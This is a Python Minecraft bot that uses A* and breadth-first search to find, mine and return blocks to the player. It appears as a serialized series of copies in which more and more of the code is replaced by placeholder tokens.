<function token>\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an 
actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. 
This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n\n\nclass _ImaginaryBot(_GenericBot):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n 
_get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. 
This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def 
_move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. 
This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n <docstring token>\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the 
appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. 
This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n <docstring token>\n <assignment token>\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate 
blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. 
This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _MineProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass _MineProblem(SearchProblem):\n <docstring token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. 
